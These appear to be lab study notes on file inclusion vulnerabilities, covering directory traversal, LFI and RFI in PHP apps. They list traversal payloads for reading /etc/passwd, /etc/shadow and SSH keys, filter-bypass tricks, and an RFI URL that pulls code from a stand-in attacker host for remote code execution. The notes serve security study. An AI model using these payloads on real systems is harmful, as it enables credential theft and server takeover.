File inclusion vulnerabilities happen when a web app uses user-controlled input to build file paths (or URLs) that get loaded by the server. This can lead to information disclosure (source code, credentials) and sometimes RCE (via log poisoning, file upload + include, wrappers, or RFI).
Core root cause: missing input validation + trusting user-supplied path/filename.
Directory traversal lets you read files outside the intended directory by using ../ sequences ("dot-dot-slash").
Example entry point: get.php?file=
Linux: ../../../../etc/passwd
Windows: ../../../../windows/win.ini
http://webapp.thm/get.php?file=../../../../etc/passwd/etc/passwd, /etc/shadow, /etc/issue/proc/version/root/.ssh/id_rsa, /home/<user>/.ssh/id_rsa/var/log/apache2/access.logC:\boot.ini, C:\windows\win.iniLFI often appears in PHP apps using include/require with a parameter like lang or page.
// vulnerable idea
include($_GET["lang"]);
# exploit
/index.php?lang=/etc/passwd// vulnerable idea
include("languages/" . $_GET["lang"]);
# exploit
/index.php?lang=../../../../etc/passwdExam note: even with a fixed prefix directory, traversal still works if input is not normalized/validated.
Error messages often reveal:
languages/ or .php)../ you need)Example hint: include(languages/THM.php) tells you “.php is appended”.
.php): older trick is null byte %00 (mostly fixed in modern PHP).../): try bypass patterns like ....// repeated./etc/passwd/. style current-dir tricks bypass naive filters.Reality check: many “classic” bypasses depend on versions and exact code. Use them as hypotheses, not guaranteed wins.
RFI is when the include function accepts a remote URL. It typically requires PHP settings like allow_url_fopen (and often allow_url_include) to be enabled.
Risk: RFI can become RCE because you execute attacker-controlled remote content in the server context.
# example concept
/index.php?lang=http://attacker.thm/cmd.txt?file=, ?page=, ?lang=, cookies, headers./etc/passwd, /proc/version, win.ini.../), then try filter bypass patterns.